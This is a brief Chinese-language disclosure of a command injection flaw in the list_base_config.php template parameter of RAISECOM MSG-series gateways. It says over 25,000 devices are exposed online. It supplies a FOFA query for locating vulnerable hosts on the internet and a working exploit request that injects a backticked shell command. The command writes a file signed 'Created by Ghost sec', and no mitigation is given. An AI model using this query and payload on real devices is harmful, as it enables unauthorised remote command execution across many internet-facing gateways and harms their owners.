已在 RAISECOM 网关设备中发现一个命令注入漏洞,影响型号 MSG1200、MSG2100E、MSG2200 和 MSG2300。该漏洞允许远程攻击者通过 Web 界面在系统上执行任意命令。问题存在于 list_base_config.php 脚本中,具体通过 template 参数触发,影响互联网上超过 25,112 台设备。
✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

URI: /vpn/list_base_config.php
描述: list_base_config.php 是 RAISECOM 网关设备中用于管理 VPN 配置的基于 Web 的界面组件。已识别的漏洞源于该脚本对 template 参数的处理不当。由于输入清理不足,该参数可被利用在设备操作系统上执行任意命令。
CWE-77: 命令注入
以下是使用 curl 命令利用该漏洞的示例:
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"
在此示例中,curl 命令向 list_base_config.php 脚本发送一个恶意 HTTP GET 请求。该请求利用 template 参数执行命令。

